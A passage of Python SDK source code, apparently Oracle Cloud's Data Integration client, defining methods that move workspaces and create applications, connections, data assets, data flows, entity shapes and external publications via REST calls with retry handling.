Retry strategies can also be applied at the operation level by passing a ``retry_strategy`` keyword argument as part of calling the operation.
Any value provided at the operation level will override whatever is specified at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
"""
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20200430',
'service_endpoint_template': 'https://dataintegration.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
self.base_client = BaseClient("data_integration", config, signer, data_integration_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
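# Hedged construction sketch (assumes a standard ~/.oci/config profile; the
# credential values come from that file, not from this module):
#
#   import oci
#   config = oci.config.from_file()
#   client = oci.data_integration.DataIntegrationClient(config)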
def change_compartment(self, workspace_id, change_compartment_details, **kwargs):
"""
Moves a workspace to a specified compartment.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.ChangeCompartmentDetails change_compartment_details: (required)
The information needed to move a workspace to a specified compartment.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/change_compartment.py.html>`__ to see an example of how to use change_compartment API.
"""
resource_path = "/workspaces/{workspaceId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
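# An operation-level retry_strategy overrides the client-level default; when
# a strategy other than NoneRetryStrategy is active, an opc-retry-token is
# added so the retried POST stays idempotent.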
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_compartment_details)
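# Hedged call sketch (the OCIDs are placeholders, and the compartment_id
# keyword is assumed from the model's purpose rather than confirmed here):
#
#   details = oci.data_integration.models.ChangeCompartmentDetails(
#       compartment_id="ocid1.compartment.oc1..<unique_id>")
#   client.change_compartment("ocid1.disworkspace.oc1..<unique_id>", details)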
def create_application(self, workspace_id, create_application_details, **kwargs):
"""
Creates an application.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateApplicationDetails create_application_details: (required)
The details needed to create an application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Application`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_application.py.html>`__ to see an example of how to use create_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_application_details,
response_type="Application")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_application_details,
response_type="Application")
def create_connection(self, workspace_id, create_connection_details, **kwargs):
"""
Creates a connection under an existing data asset.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateConnectionDetails create_connection_details: (required)
The information needed to create a connection.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Connection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_connection.py.html>`__ to see an example of how to use create_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_details,
response_type="Connection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_details,
response_type="Connection")
def create_connection_validation(self, workspace_id, create_connection_validation_details, **kwargs):
"""
Creates a connection validation.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateConnectionValidationDetails create_connection_validation_details: (required)
The information needed to validate a connection.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ConnectionValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_connection_validation.py.html>`__ to see an example of how to use create_connection_validation API.
"""
resource_path = "/workspaces/{workspaceId}/connectionValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_connection_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_validation_details,
response_type="ConnectionValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_connection_validation_details,
response_type="ConnectionValidation")
def create_data_asset(self, workspace_id, create_data_asset_details, **kwargs):
"""
Creates a data asset with default connection.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateDataAssetDetails create_data_asset_details: (required)
The information needed to create a data asset.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_data_asset.py.html>`__ to see an example of how to use create_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
def create_data_flow(self, workspace_id, create_data_flow_details, **kwargs):
"""
Creates a new data flow in a project or folder ready for performing data integrations.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateDataFlowDetails create_data_flow_details: (required)
The details needed to create a new data flow.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlow`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_data_flow.py.html>`__ to see an example of how to use create_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_details,
response_type="DataFlow")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_details,
response_type="DataFlow")
def create_data_flow_validation(self, workspace_id, create_data_flow_validation_details, **kwargs):
"""
Accepts the data flow definition in the request payload and creates a data flow validation.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateDataFlowValidationDetails create_data_flow_validation_details: (required)
The information needed to create the data flow validation for the data flow object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_data_flow_validation.py.html>`__ to see an example of how to use the create_data_flow_validation API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_flow_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_validation_details,
response_type="DataFlowValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_data_flow_validation_details,
response_type="DataFlowValidation")
def create_entity_shape(self, workspace_id, connection_key, schema_resource_name, create_entity_shape_details, **kwargs):
"""
Creates the data entity shape using the shape from the data asset.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param oci.data_integration.models.CreateEntityShapeDetails create_entity_shape_details: (required)
The details needed to create the data entity shape.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.EntityShape`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_entity_shape.py.html>`__ to see an example of how to use the create_entity_shape API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}/entityShapes"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_entity_shape got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_entity_shape_details,
response_type="EntityShape")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_entity_shape_details,
response_type="EntityShape")
def create_external_publication(self, workspace_id, task_key, create_external_publication_details, **kwargs):
"""
Publishes a data flow in an OCI Data Flow application.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param oci.data_integration.models.CreateExternalPublicationDetails create_external_publication_details: (required)
The details needed to publish a task to an OCI Data Flow application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_external_publication.py.html>`__ to see an example of how to use the create_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_details,
response_type="ExternalPublication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_details,
response_type="ExternalPublication")
def create_external_publication_validation(self, workspace_id, task_key, create_external_publication_validation_details, **kwargs):
"""
Validates a specific task.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param oci.data_integration.models.CreateExternalPublicationValidationDetails create_external_publication_validation_details: (required)
The information needed to create a task validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_external_publication_validation.py.html>`__ to see an example of how to use the create_external_publication_validation API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_external_publication_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_validation_details,
response_type="ExternalPublicationValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_external_publication_validation_details,
response_type="ExternalPublicationValidation")
def create_folder(self, workspace_id, create_folder_details, **kwargs):
"""
Creates a folder in a project or in another folder, limited to two levels of folders.
